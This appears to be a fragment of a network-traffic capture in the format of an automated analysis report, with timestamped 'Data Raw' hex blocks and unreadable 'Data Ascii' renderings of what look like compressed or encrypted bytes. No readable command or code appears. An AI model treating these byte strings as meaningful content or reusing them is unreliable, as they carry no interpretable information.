                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12841INData Raw: cf 2f 8f 9f db 97 fe ff ff 7f 7e b0 3e 40 8d 81 c5 21 40 ab 3c 6d c2 bf 15 f7 47 d6 bf 91 30 bc 25 40 40 05 3c d9 bf b8 98 05 da bf 0b 89 33 d6 bf ef ba d6 2d 40 a2 fb a7 dd bf db 94 f6 2f 40 7d d4 27 21 40 a1 6d 00 29 40 e7 e0 a8 ca bf 29 5b 82 de bf 3d 54 79 2d 40 a4 01 f9 d1 bf fc fc c0 d2 bf 8f 7d f6 de bf 7b 9e 5c 43 40 ab b0 ab 64 ad 6e a3 15 eb 1f c5 f6 d5 4c c4 71 dd fd 83 77 c8 76 7b 13 de eb 58 f7 d5 ea 6f 27 49 13 69 68 65 ea 00 9e 42 97 c9 f3 74 87 62 ca 3b 86 b2 07 3a 91 a3 0d 77 b5 e9 0b 38 65 16 eb 29 43 30 d6 4c 42 07 1b fe 83 01 4e b0 78 13 78 1d 9e f4 d5 1c f9 e1 4a 13 ff 7e a3 e9 00 78 4c 51 ca f3 7a 6c 13 6f 00 6d 00 f0 6b 40 e0 b4 c4 98 e8 b2 75 fc 64 40 e9 ad 86 c9 08 ab 03 f7 9a ff 6b 5b 80 f5 0e 4d 71 dd 9f 7f e0 59 71 96 77 4f a8
                                                                                                                                                                                                                                    Data Ascii: /~>@!@<mG0%@@<3-@/@}'!@m)@)[=Ty-@}{\C@dnLqwv{Xo'IiheBtb;:w8e)C0LBNxxJ~xLQzlomk@ud@k[MqYqwO
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12857INData Raw: ec ff 0d b2 be 4a 42 a1 b5 25 9a 29 c2 0e e9 c8 e9 bb e2 0f 6d 96 41 e6 f2 37 56 5d 63 97 83 69 e1 05 33 71 16 33 d2 36 2f d6 7d 78 f1 8c 29 96 b4 f8 d3 e9 e5 64 fc d5 a9 c3 13 64 70 16 93 49 12 89 29 30 0a de db e9 55 0e 38 7e 96 5d ca c5 24 56 8d ff a0 90 69 9b 01 04 62 16 cb 66 01 3c d6 29 4c c6 9f 29 5e 97 7a c3 a9 75 a8 19 47 e8 63 ff 8d 2d 02 14 2e 78 b2 91 4a e4 79 a2 97 65 0d 76 82 b0 ae f0 8c 9d 7a d3 66 8a 3d 9e 31 b9 8b 7d d1 6d 3c 73 b2 a5 04 e1 8e cd 3e d0 97 88 fd 69 54 f8 77 c2 ca 01 f7 8b 2d 00 96 26 7e b2 5b 00 ec 7f a2 95 e7 05 70 82 42 1c f8 8a 9d f8 11 6e 8c 3d 94 3b b1 8d 7d 03 e2 86 76 f2 af ec d5 40 be d5 42 00 61 4d 06 00 a1 f9 4b a0 0d b1 76 49 23 56 2b a9 d1 86 e9 d1 d3 a7 7f d6 5e c0 6b 2d 16 85 ec 8d 88 69 a3 18 70 d2 a9 43 1d
                                                                                                                                                                                                                                    Data Ascii: JB%)mA7V]ci3q36/}x)ddpI)0U8~]$Vibf<)L)^zuGc-.xJyevzf=1}m<s>iTw-&~[pBn=;}v@BaMKvI#V+^k-ipC
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12873INData Raw: 6d 00 2c 46 4c 76 69 29 f3 7b 39 2c d5 23 82 c7 55 1d 84 9b 5e 02 64 0e eb ab ff 09 4b e9 82 79 58 33 ee 7b 35 1e 01 74 bf 61 6a e8 c1 57 2d 79 be 95 a3 15 a0 84 01 00 00 50 68 c6 d8 3b 31 4e 68 d1 20 b2 30 31 b6 10 b1 e4 16 a3 6a d8 3b 66 89 ff f6 9d 0c cf 27 c4 4d bc 12 19 4b 74 71 3d 57 82 98 c1 b2 6e 51 2a 2b 9f 55 67 5a 69 3b 00 00 00 d0 bb 89 11 84 73 e5 37 e8 7b bd 6d bf d2 ad 1a eb 42 ea 1f 74 6c 4f ff ff ff ff 57 a0 17 84 e3 54 83 cb 95 51 70 e5 7b e5 7a db 4c 02 c5 1e b6 95 5d 9d 63 4f 00 00 00 f0 94 ca ee 97 22 8b 99 2d 85 6f c4 e9 8c d7 30 3b a3 22 ac d7 aa 14 cf ff c2 c2 2e 8f da 87 05 ec 7b 8f cd c0 e1 7b e3 ea 4d 77 8d 8b ee e3 7b 91 83 cc 97 f5 04 f5 77 f6 8a 46 6d f6 5d 9f 10 84 4b 47 25 2c 86 15 07 b4 95 29 1f 60 4f ff ff ff bf 02 9d 17
                                                                                                                                                                                                                                    Data Ascii: m,FLvi){9,#U^dKyX3{5tajW-yPh;1Nh 01j;f'MKtq=WnQ*+UgZi;s7{mBtlOWTQp{zL]cO"-o0;".{{Mw{wFm]KG%,)`O
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12889INData Raw: 55 1a 4e ea ac ec 69 60 66 6a 68 ad 1f d8 ac db f2 5d 7b bf f4 50 af 58 4c 56 5d 5a 5b 84 5c c8 3f ab 2e d9 d7 4f 24 56 e1 40 dc 1a 00 46 af e6 fe b1 25 f4 f8 d0 01 00 00 72 2e 78 3a a0 1c 23 9f c6 df 16 ac 27 3d 20 9d ea 64 3a e0 e2 bc d9 37 a0 34 45 11 c0 9f 81 dd df c3 3f 11 2e 3a ca 9f 67 58 6d 3d c0 b3 42 13 39 a0 ec af 1d 3f 40 87 70 f7 c7 ff a6 bd cc 3a 20 22 ba 74 c1 df 5d 04 37 c6 1f 48 02 8a cb 5f 5c 03 42 3c 60 d9 83 8c 3f c0 a7 90 69 36 60 41 31 55 9f 64 ca 29 a6 d9 cb 99 7e 5b f3 98 bd 55 73 3c bb 14 fe f5 ac 02 17 d0 79 6a 16 e3 af c7 ac e5 f4 ed 64 bf c2 fe 1f 47 4c e8 ab ea 44 84 5a a6 8f b4 2e b7 b9 ff 3b 56 bf 7c ed 98 54 0d d7 b8 58 f3 d6 43 93 70 3c b5 f2 38 f6 ac f4 e9 16 7a 6a f8 d5 69 c4 ac d3 e2 2b 67 bf f4 98 d9 44 4c ee bd 2c 47
                                                                                                                                                                                                                                    Data Ascii: UNi`fjh]{PXLV]Z[\?.O$V@F%r.x:#'= d:74E?.:gXm=B9?@p: "t]7H_\B<`?i6`A1Ud)~[Us<yjdGLDZ.;V|TXCp<8zji+gDL,G
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12905INData Raw: c0 34 54 ec d8 6d 43 33 b4 a3 97 07 a1 d1 90 82 43 99 a8 75 7a 7f ab 81 8e 6b e7 b1 6c 3a d0 f6 29 9a 41 3d 90 0e 35 2c 38 42 f2 2a 56 21 83 8c 6a 0f b7 f2 49 51 ec 74 a8 d8 f3 cb c1 53 ee 3e d6 0f 3d 1d d9 a9 b9 24 ca 8a e8 a7 96 55 af 13 b8 bc d1 e5 e4 37 aa 18 32 a2 fd 2e 41 23 aa 79 61 6d 1c 85 22 05 84 15 41 b2 de 82 53 70 94 a3 5d e2 16 36 96 d5 f0 bb 92 e7 80 59 2b 66 e9 67 7a 23 10 4c 8f 6f 76 9b a1 2a db 80 e9 82 b9 70 73 6b eb da bb 3c ae 05 4f 79 ad 3d 58 02 bf 9b 81 65 b3 ef 96 a0 a0 66 9f 6f 62 b7 63 be 89 2a c4 1f 56 a3 6d f2 e4 3b b8 5c 20 59 3e 2b 7f 32 42 9c f0 43 cb 0d 81 d0 c1 81 d8 c4 a0 d8 ed 9f a1 0f cb 86 80 62 16 dc 70 4a 3b 97 ec 39 25 52 72 98 6e 4f 6c 8c 0c ed f9 21 2c 9f a2 98 40 66 d0 df cd 53 ad 0f d3 b5 fa 8a 3f 1e 84 dc 68
                                                                                                                                                                                                                                    Data Ascii: 4TmC3Cuzkl:)A=5,8B*V!jIQtS>=$U72.A#yam"ASp]6Y+fgz#Lov*psk<Oy=Xefobc*Vm;\ Y>+2BCbpJ;9%RrnOl!,@fS?h
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12921INData Raw: 9d ba 86 22 0e 0d f2 15 9d 91 33 f2 8b 59 76 c4 01 ce 37 5f 3b 39 b9 40 a0 8f 91 ad b8 f5 7c 7e 34 e3 0c 9e f4 82 b8 7a 49 75 76 f8 da 50 56 40 9b 49 8d 4b d1 c4 d3 c2 e8 c0 fc 64 0e 63 21 29 a1 14 99 55 07 9c be 61 38 4b 0b 2e 6d 7b fc bd 7a 14 9c 25 8d ff aa f9 ff 59 ea 91 c7 4f ef 72 5d 5e 50 b9 78 3f b6 14 f4 64 bf c8 bd 8d 12 aa 3f 55 83 80 46 04 78 57 89 83 d7 ae b6 fd 12 f8 ee 6e 52 08 f3 99 77 b9 fc dc ed 4c 1c db 66 97 c7 52 92 89 d3 2e 7d 31 93 38 90 b0 10 d0 0d d3 07 4e 67 b4 f1 96 2b 82 8e ac 70 ea be 0d 62 fa 36 2f cb 63 5b 1b bb 7d dd e7 ea 0a 86 8a 51 3b 2c ee cf 24 17 7d a1 8a b4 e0 43 00 1e 5c e6 2e c0 bf 3f 48 28 62 78 12 10 c4 9e f4 58 fd a7 fe ca 4a ac 2d c6 79 43 5a c0 97 73 a3 49 aa 42 cb 0d 98 08 0b 4b b4 76 62 cb 25 d9 a4 6a 50 bb
                                                                                                                                                                                                                                    Data Ascii: "3Yv7_;9@|~4zIuvPV@IKdc!)Ua8K.m{z%YOr]^Px?d?UFxWnRwLfR.}18Ng+pb6/c[}Q;,$}C\.?H(bxXJ-yCZsIBKvb%jP
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12937INData Raw: a0 2c cd 34 b1 8d 54 7d 37 fa f8 93 1e 24 25 59 7a a7 74 54 4e 72 2b f7 2b df c7 4c 50 c2 d7 54 08 46 ae a8 99 4f ce 8d 49 e2 99 95 51 c4 9f 85 7d c5 c3 2e 5f a3 75 ec de 90 b0 90 50 12 c6 21 23 b8 a6 1e be 40 4f c8 bb 5c 7d a5 ce a2 4a b8 63 15 54 0d 18 f8 82 85 db fa 44 82 f2 38 ce bf 93 cc bd 02 a6 b5 ea 49 fc 35 ce 24 19 05 96 1c a5 bf e3 ae 04 ec 35 26 28 cd f4 72 93 e3 90 7c 57 19 e2 51 4b 78 5d f8 66 96 4b 55 f7 3a cf f0 3a 4f 08 17 51 21 74 ca c3 c2 9d 0f 29 67 48 f8 1f 38 cb 8f 5c be a1 3d 27 2f 22 2a eb 6f 36 42 be 91 00 10 96 e4 7e 03 13 b8 5e d4 56 f8 a5 8f 9e 7d c0 62 8f e3 b0 70 a7 6a 88 85 6f 6c 0a c9 45 60 c1 ee ef 3b 2d 7c 10 47 6a 19 58 ec 4a 07 73 43 72 5a 8a ee 72 51 77 22 0c 09 5c dc d6 47 39 b1 c0 42 df 02 ab bc 63 a6 2f e0 fc 50 e6
                                                                                                                                                                                                                                    Data Ascii: ,4T}7$%YztTNr++LPTFOIQ}._uP!#@O\}JcTD8I5$5&(r|WQKx]fKU::OQ!t)gH8\='/"*o6B~^V}bpjolE`;-|GjXJsCrZrQw"\G9Bc/P
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12953INData Raw: 27 ff fe 22 62 b7 2f 8d de 92 41 c8 d4 c8 55 d4 c2 5e af 34 4a a1 83 c6 95 a2 ca 4c 59 3e 66 a9 fd 76 62 17 6f 4f 37 5b 90 03 7c fd d3 7d a4 7a 54 2a 44 01 a0 7b 2d 43 ce 33 0f 64 5b f1 10 d8 c3 29 ec b5 37 fc d6 25 4a 12 13 62 99 f7 38 ab b9 11 99 5e fb 6f 79 b4 80 66 74 6c 2c a6 e2 cf e5 31 d0 72 93 8a 7f f6 85 cc bc 0c bc fa 64 be e7 df 86 89 34 a2 4c 18 3b 9d 57 11 e0 fb c6 69 bc ba 70 be 31 18 eb f4 10 24 b8 93 51 46 5c db fc 1b 11 4c fa 41 6b 2a 06 03 59 aa 76 00 8e ea d5 01 ed f4 f4 b7 f3 3c 62 2a 02 cc 26 fd f9 41 9d c9 df 09 ae a6 97 79 8c 3a e9 c4 9f ee 04 db 6e a0 41 01 0d c2 3d c3 4f b8 b5 c7 87 cc 2d 84 f4 29 c9 59 66 a2 3f e1 b5 28 cc 1a b3 5f 72 60 79 4c 78 9e 8a fd fa 53 49 77 a0 8a 58 67 c1 ac 18 51 31 4f 37 e4 6f f0 75 d1 6c e4 8b a9 ef
                                                                                                                                                                                                                                    Data Ascii: '"b/AU^4JLY>fvboO7[|}zT*D{-C3d[)7%Jb8^oyftl,1rd4L;Wip1$QF\LAk*Yv<b*&Ay:nA=O-)Yf?(_r`yLxSIwXgQ1O7oul
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12969INData Raw: e1 01 1d 29 b3 d7 d0 8b c4 89 e0 88 94 e1 06 46 b8 27 f8 4a e8 2b 03 7d 25 43 d9 af 2f 2f db 3e 6e 30 da 34 7c 17 98 8d ab 98 b8 d8 58 66 34 c3 7e 69 b7 41 09 58 8d 42 41 54 79 5d a5 6f 6e 78 ed 2b d2 79 f5 69 92 7d d7 e0 b9 e7 20 1f 9b 97 a9 b1 cd 6d 61 85 31 55 84 0d fd 56 63 c5 48 c9 e2 32 9d c8 60 0b f7 94 c2 86 44 db 78 12 08 d8 3c 92 21 9f 55 93 47 bf 54 ba 3c 0e b8 87 ee 44 2f b1 93 29 34 89 62 6a cc 04 9a ff f1 52 fe 5b 21 19 16 ff 45 3e db 45 f3 eb 2c 32 88 a1 b4 95 7e 19 6e e4 8f 37 76 da 63 1a 52 5b 95 83 a0 29 2e df cd 11 87 34 e1 8d b9 2d 74 d1 d2 3b 10 70 f2 3d d7 8d c4 30 ee ed ef 2d 49 01 07 c8 e5 24 d1 17 04 8d 5c be eb be c7 80 1c df fc 14 2d 6a 49 a9 09 59 ee b9 34 fe c5 ea e4 e7 ec 7b 49 55 78 41 92 89 fb be 52 c8 af b5 10 d0 d3 94 ee
                                                                                                                                                                                                                                    Data Ascii: )F'J+}%C//>n04|Xf4~iAXBATy]onx+yi} ma1UVcH2`Dx<!UGT<D/)4bjR[!E>E,2~n7vcR[).4-t;p=0-I$\-jIY4{IUxAR
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12985INData Raw: 79 19 c0 bd fe bf 5d 4d 15 3c de 5f 1e b7 1f af c1 12 32 a0 d0 ee de b9 77 15 63 90 a0 20 00 5f 25 60 a2 5b 76 a2 7f ba e8 e7 d2 ab 53 33 10 2d d0 4e 91 91 3c eb f8 22 e6 19 72 45 9d 32 8d 0d 52 a8 c4 44 5a 4a f5 fd ce 4b 27 27 89 33 fd 8e fd f1 56 30 84 ab f2 ca 49 da bd ce d8 ba ac c1 c2 ca 00 44 3b ff bb 52 3b 13 90 c4 2f 82 43 fd 42 fb d7 f6 37 af df 25 d2 33 08 7f 56 63 1c 26 06 1d 34 0d 27 1f e0 b7 30 d0 72 86 a7 4d 25 8c 77 5f ab be 57 da f9 19 af d2 be 71 52 ba 18 8f 1d ac 73 09 15 18 fd 2d cc 63 53 60 49 f9 7f 57 22 00 f2 f0 94 9f 3e cc de 26 f8 ef 95 b5 f4 99 e4 0c f3 88 22 fa 3c 6e 5d bd e5 f3 4a b1 51 ba 88 4d 19 70 68 47 e1 47 1e 33 e7 30 f1 8a 8d 9a a4 ef 18 fa 08 a5 8c 25 40 13 c5 0a fe 28 cd 63 b2 78 bf 3c f8 39 0b 85 ad 9e 1b 64 56 1c 71
                                                                                                                                                                                                                                    Data Ascii: y]M<_2wc _%`[vS3-N<"rE2RDZJK''3V0ID;R;/CB7%3Vc&4'0rM%w_WqRs-cS`IW">&"<n]JQMphGG30%@(cx<9dVq
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13001INData Raw: 2a fb cb af 94 be 00 bc ae bc e1 ce 1d cc c6 34 e9 93 6a 0b e5 1d 79 70 f2 5b fe 66 11 a6 0f ea 66 a1 a1 45 d1 64 8a 87 70 42 d3 f3 ea 10 bb 72 3d 9c f4 b4 b6 b0 33 91 51 a7 09 6f 7c d5 e6 2c 66 dd 0d 05 36 c7 67 4d 20 b4 e4 dc 52 77 05 16 b0 0a 27 20 15 ca 92 02 51 21 34 05 4f d0 83 2d c1 cd d7 a4 1b 16 5c 3d 8d 3d b7 2d e7 39 5d 86 de fe 2f a5 a3 ed 87 0d 93 ea e3 71 d0 c8 d4 93 e4 ef 8c 46 3d 14 4e 10 7e b2 15 e6 88 bb 0c 4a 04 3a 73 7d e0 51 e1 ca 36 81 3c ff c5 fd c2 fe b9 35 11 67 04 38 9d 60 7c ac 39 34 9a ae a0 57 c6 9a 5a 1b 28 a8 92 17 f6 c2 f7 54 ab 1b 85 55 0e 3b 8d 64 45 e2 83 5e 69 e4 78 cb 1b 05 58 98 ed ef 0b 99 5f ff 9b d3 e6 0c 45 ea 12 1e e7 b5 95 c9 2b e9 76 90 0c 15 73 68 1a 1a 2d 7d fb 2e 05 ec 74 f4 d1 d9 cc f9 bf 00 13 75 92 15 b6
                                                                                                                                                                                                                                    Data Ascii: *4jyp[ffEdpBr=3Qo|,f6gM Rw' Q!4O-\==-9]/qF=N~J:s}Q6<5g8`|94WZ(TU;dE^ixX_E+vsh-}.tu
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13017INData Raw: ed d8 93 d0 49 17 aa 6d ce 90 2c 25 7f e8 9f a9 9d ab 52 91 e1 18 66 70 a1 2f 98 0c 81 f5 47 8b 7e c4 33 00 4b 70 80 30 22 0b bf 50 65 b3 6a 9f e3 5b 2e 82 64 46 39 6a 24 63 7d f2 23 fe b0 2c 9e c0 05 ff b7 25 bb 98 4e a2 d3 03 9e a1 22 a4 74 78 4a 3f 01 f1 be ba 69 ba 10 31 06 2d da 66 9e 87 1f b2 00 ee e2 2a e4 08 98 7b fe 13 af 35 12 29 48 11 5c 64 5d 60 e0 a4 f4 6b 00 44 12 d4 7a b4 85 66 9e a7 75 0a 9c 27 94 4c 3e f5 e4 c1 4c 46 aa 16 d6 ff 9f 0d 83 de 5d dc a4 a7 13 f8 3f b9 c4 77 00 8a 3d e7 74 24 6a 2c 9a 28 03 e9 d0 10 f9 cf 5d 55 e9 37 53 71 61 aa ac 41 17 e4 9e 12 df 8b 09 d3 9f a7 48 bd 1c 18 bf 8e 7e 6f 9d ed 4f 5d 0d 36 23 19 51 8a 90 33 e2 82 23 8d 8a e7 42 0c f9 69 d7 48 cc 35 99 ea 18 4e d2 8e 71 b7 e2 19 32 47 a5 f6 08 12 c1 5f e7 8c 45
                                                                                                                                                                                                                                    Data Ascii: Im,%Rfp/G~3Kp0"Pej[.dF9j$c}#,%N"txJ?i1-f*{5)H\d]`kDzfu'L>LF]?w=t$j,(]U7SqaAH~oO]6#Q3#BiH5Nq2G_E
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13033INData Raw: 1f 74 58 7d 05 83 fc 1c 3b 51 8a fd eb 90 94 10 e1 54 16 df b6 8d 78 14 39 6f fb cc c8 9a 33 35 ed e7 60 6d 73 fd 72 8c 83 d5 14 fb f0 77 90 74 bb 78 d0 3a 5d f4 6b 09 d8 1e a4 84 52 4d 32 0b a1 e4 50 d6 05 3e 30 61 4a d4 f1 b3 2e 7f 7a ba 75 a4 d4 7c bf f3 30 87 98 07 c7 dc b1 b6 56 83 d1 08 28 e4 c4 0f a7 f1 9e e2 54 cc ae ba 7a 48 30 54 71 05 23 76 f2 92 f0 a1 95 cc 51 20 25 f5 b6 38 0a 76 44 ce d5 04 29 7f 2f 60 40 ba 50 ec 7f b3 9f eb 09 3c 0a 87 10 2c 45 d7 ec 70 51 1e d0 0b d2 bc 05 4b 86 0d 68 a6 d6 3b 68 78 d7 5a b6 53 61 1d bb 51 45 58 eb b2 c2 40 4a 3d 45 e0 bb d9 d5 21 bc de a7 f0 f0 70 09 35 b4 02 c1 b0 29 2a 38 2d 16 f2 cc e7 c8 b3 0a 6c 5c b0 c4 5b fd 43 f5 21 d3 00 ae ac 90 42 1e 50 1f 0a 1f f1 2b aa 06 16 26 56 1f e8 17 99 67 06 fe 5a 2e
                                                                                                                                                                                                                                    Data Ascii: tX};QTx9o35`msrwtx:]kRM2P>0aJ.zu|0V(TzH0Tq#vQ %8vD)/`@P<,EpQKh;hxZSaQEX@J=E!p5)*8-l\[C!BP+&VgZ.
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13049INData Raw: ac c4 5d 36 7d f6 a7 77 2c 36 d1 cd c2 8b 63 29 80 05 b9 c7 d3 79 a1 ff 79 22 e7 ff 8a 26 b6 68 fd d7 40 c7 66 73 e4 05 c3 2c 38 fc c4 ae e4 9f 2d 79 ea b8 c4 ef ec e2 86 0d f2 3e a4 c2 f3 a6 67 85 62 93 77 a9 21 03 49 46 49 85 a0 ec d4 7a a2 23 5d 97 99 e1 a4 78 26 3c 0d e0 15 52 4e aa 65 78 60 d5 d6 8f 39 b7 02 20 47 7e 52 f4 c6 15 43 0e 37 49 4a b2 8d 06 89 89 58 51 05 b5 2b 4e f2 7c 5e 07 aa d0 aa 69 d3 74 2a fa 14 ad f4 d2 b5 ab 9c c6 b1 d1 25 1c bb 7a 21 38 5d 4d e7 f6 97 0f 04 32 5f 76 08 bc 4a 6f 84 c9 d1 29 2a 9d d8 92 d1 d5 5d 83 f5 89 69 09 08 ad fc af 76 c4 15 cf 7c 78 8b 02 5a 5d 2c f9 ad 3e 83 26 64 24 e5 b3 d2 ee 41 a4 33 8c 54 f7 39 98 fb 03 8e 1c d8 de ec f0 07 f3 0c 52 f1 91 b3 47 c3 65 6e 07 4e 69 fc 1e 47 37 2a 21 d3 de 4a d3 72 cd b1
                                                                                                                                                                                                                                    Data Ascii: ]6}w,6c)yy"&h@fs,8-y>gbw!IFIz#]x&<RNex`9 G~RC7IJXQ+N|^it*%z!8]M2_vJo)*]iv|xZ],>&d$A3T9RGenNiG7*!Jr
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13065INData Raw: ab de eb 96 04 cf be ef 12 e3 cd a8 14 2a f6 db 94 94 91 71 e5 9b d0 f4 56 96 47 ad 89 9e 1a 16 6b 89 1b 57 97 6e 47 3b 6d 74 35 30 99 1f 55 ba 09 2c 79 48 eb 4c 01 a0 ce ec ce 88 1c f6 92 60 ce 09 ec d2 bb aa 53 46 d8 39 f1 21 cf 29 98 aa 0f 8f 0d 3a 02 27 b3 e6 9a 5e 99 72 43 45 ad 57 01 e6 1f 52 82 c5 b3 4d 9b f0 1a 9f 0d e8 a1 9c 69 28 ab 08 07 b3 9d 7f 9d 37 bb 11 41 84 f9 bd fc d8 66 53 98 db 3b be 9a 17 0d 02 cc 1f 9d 34 61 87 be bd e8 6e de 7c ac 06 d4 70 60 98 bb 4c 79 fc dc 62 fb 4a 62 9e a9 27 f8 19 4d 7a 95 bb c3 de 1e 56 b2 2b 99 ca 46 55 05 92 64 48 e5 0d 2d b5 27 2a 88 72 e4 f3 44 6d a5 de 53 22 a4 46 d7 ff 01 4e da 00 9c 67 ed 94 4f dc 36 3b 81 fc f8 5f f7 c4 c1 a9 c2 9f 09 ee 64 fa e1 0e 66 54 c6 69 53 ee 3c 31 08 2b a5 5e 28 ab 0e a7 8d
                                                                                                                                                                                                                                    Data Ascii: *qVGkWnG;mt50U,yHL`SF9!):'^rCEWRMi(7AfS;4an|p`LybJb'MzV+FUdH-'*rDmS"FNgO6;_dfTiS<1+^(
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13081INData Raw: 85 cc cd 7b 73 f6 47 72 0e b7 e7 66 86 7a 0b 7f 65 0b db 8f 6e 47 46 6f d5 3e 0b bc 24 13 0a 10 d0 96 ba a9 f6 ea 93 b9 8b 79 29 d2 78 19 99 06 79 50 14 a3 dd b0 a1 fe 43 61 7a 16 3c f2 6d 3b 13 18 23 7b 0a a5 28 f7 75 bd 51 6b e5 08 63 18 ba c6 8b fd 7b 52 b4 0f 27 07 a6 db bf c6 40 28 60 04 f9 0d d2 2d 98 58 34 2a 1b 15 e8 2f 3c 69 72 90 7d 67 8f 43 2d b8 6c 6f 87 14 48 ae de 81 ec 44 a1 f8 7d d5 8f 72 16 b1 6e 8c fd a1 0c ad 52 20 96 45 89 6b 77 72 e3 94 85 9b 8d 4e 8e b6 22 2c 81 d6 e6 47 73 8d 58 2a ac 63 c6 58 e6 22 7b 0f b1 ec 30 0a ea 8b f1 25 dc 27 c9 46 13 02 46 e2 2f 42 69 76 d6 54 e6 54 31 b1 1b 6b 00 42 8a 0b 33 64 77 f1 cb 13 d1 8b d9 fe 12 2b 30 0d ce 66 e4 af cd 89 8f 10 8d e6 47 18 29 a2 a8 dd 8e 49 c6 5e 77 c7 e2 8f 5b 4d ff ef 42 64 b3
                                                                                                                                                                                                                                    Data Ascii: {sGrfzenGFo>$y)xyPCaz<m;#{(uQkc{R'@(`-X4*/<ir}gC-loHD}rnR EkwrN",GsX*cX"{0%'FF/BivTT1kB3dw+0fG)I^w[MBd
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13097INData Raw: cf 8a bd 55 8b 8f 7d 09 e3 e8 5e de a3 72 b8 bf 69 e0 2c fc 19 57 23 7e 18 a9 74 eb c3 a8 df de 52 a5 cf 78 ad 1e 32 ce fb de c6 b8 7c 17 3f c6 fd 57 f1 43 9a 7e d8 11 b9 76 f2 06 6f 06 16 42 02 34 b6 5e 66 14 c5 50 7a 34 99 9c f9 6a 80 9c 96 f0 1e 6a 87 98 12 94 cc 8c a6 01 92 5a 11 92 72 64 cc be 7c 20 3c 61 a6 98 17 d6 13 ac 19 29 a4 d9 e6 59 b8 8d 5e ae 5e 1e f0 39 f4 d7 55 1d 93 32 46 7a 8e 2e 7d 19 ab 2b 2c f7 c7 0d 47 07 03 7e 8b 4f ae 1c 8a 34 b0 20 e7 8a 0f f9 1b 3e bf fd 6c d6 7e b1 26 17 d9 23 16 a2 46 a1 f7 b6 93 15 06 7d c1 41 97 5a 0d b5 d2 97 fd f0 33 56 8e 9d d7 16 30 ac 49 3f aa de 17 54 12 1e 08 a6 f7 b4 ea d8 51 f8 01 a1 63 2d fd be cd fc 62 b8 0c d7 30 bf 89 e2 a3 73 bf fb b5 a5 32 26 e3 43 f4 25 8f 84 6d 5e d9 56 e9 21 c4 4d 9a 50 e8
                                                                                                                                                                                                                                    Data Ascii: U}^ri,W#~tRx2|?WC~voB4^fPz4jjZrd| <a)Y^^9U2Fz.}+,G~O4 >l~&#F}AZ3V0I?TQc-b0s2&C%m^V!MP
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13113INData Raw: 4d fb 59 1f d9 97 27 f5 30 0c eb a6 34 52 b6 7a 8b 7e 1f bd 92 7c 11 b6 36 11 7f 30 7c 8d 32 5c cd c8 3a ad 88 94 54 42 29 bf 04 f4 77 a8 45 b6 df 82 93 ce 35 b7 5f 21 9d 77 d4 3c 77 65 99 9c ea d8 d3 24 10 38 c4 8d 9c c3 dd c6 e2 50 d2 2c 93 93 53 64 b7 2e 05 b5 63 9d ee f9 98 88 34 cd 18 db e4 42 78 f9 49 2d 32 76 11 39 92 2c b7 01 d9 36 6e c3 4e 01 b5 86 5f e7 8b 77 63 0d e8 e3 95 cd ae 78 4f 77 6d bf f3 c0 42 41 3f cc 29 ae e0 2d 10 bd 42 15 e1 1d de 51 3a 6e 17 b2 36 78 cc 2c db 44 b1 0c c0 9d d6 c3 ec b8 db 94 de cf 4b cc a2 22 de 7d d2 a0 7c fa 0d 3f 11 fc e9 12 52 6e 0f 8e c5 ec 9a 98 5b dc 1d c3 74 e2 97 22 ca 67 bf 8d 98 4f c2 31 8c d7 61 3f 77 07 4f 4e b7 0e c6 8b bd be 0c cb 54 14 fa 1d 72 69 00 0f 1d 6b 1c ae 64 49 01 74 e5 7e fa 83 4a 28 10
                                                                                                                                                                                                                                    Data Ascii: MY'04Rz~|60|2\:TB)wE5_!w<we$8P,Sd.c4BxI-2v9,6nN_wcxOwmBA?)-BQ:n6x,DK"}|?Rn[t"gO1a?wONTrikdIt~J(
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13129INData Raw: eb c5 3b b0 e4 28 32 8a 1a 5d f5 bf 00 3f d5 4f 1f 7e 97 d6 1e 6f 37 fc a1 81 2e 38 15 a9 37 be fd f1 37 05 be fb 07 5a 31 3c 5e 33 f4 ae 59 e1 d8 88 80 c6 d8 aa f0 c8 00 51 40 9b 18 89 66 68 0a d5 ea e3 31 6c 05 dc cc e0 b6 ba 11 cf 7b a1 3c 59 e5 5f b1 86 1a b0 36 7c fa 8e b3 4f 4c f7 ac af b7 c6 ed fe 14 7e e3 c1 bf 1f aa f4 ea e0 ff 0e 8d b5 e0 6c c0 73 d4 e2 61 a0 16 f8 3c 8e b0 d1 31 bc 49 b5 1f b0 7d 75 de aa 23 9a 54 0e 1b 72 65 f0 3f 18 3f 99 08 00 55 f7 9c 12 20 16 9a d7 67 f5 25 6e 48 1a 5c 1f 5b a5 9b 77 4d 22 7a e8 e1 54 c1 af 77 6e 88 02 ae 47 2d 61 c2 f4 f6 ac 1e ba b7 2c 23 03 6a d7 42 f7 39 2e 3e 6c e8 0f 2a 0c f3 d6 de 85 98 c5 f0 6b 24 20 28 bc 33 c3 9d 2c 24 2f c9 9b f9 fa 38 8e ad d0 55 9e 34 95 09 29 d7 2c 50 01 1d a5 06 2c 69 94 24
                                                                                                                                                                                                                                    Data Ascii: ;(2]?O~o7.877Z1<^3YQ@fh1l{<Y_6|OL~lsa<1I}u#Tre??U g%nH\[wM"zTwnG-a,#jB9.>l*k$ (3,$/8U4),P,i$
